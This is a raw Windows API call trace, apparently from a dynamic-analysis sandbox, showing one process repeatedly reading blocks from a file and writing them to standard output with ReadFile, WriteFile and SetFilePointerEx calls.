WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.888] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.888] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] GetFileType (hFile=0x50) returned 0x1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.888] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.889] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.889] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] GetFileType (hFile=0x50) returned 0x1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.889] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.890] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.890] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.890] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.892] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.892] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.894] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.894] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.895] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.895] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.897] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.897] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.898] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=4) returned 0x58 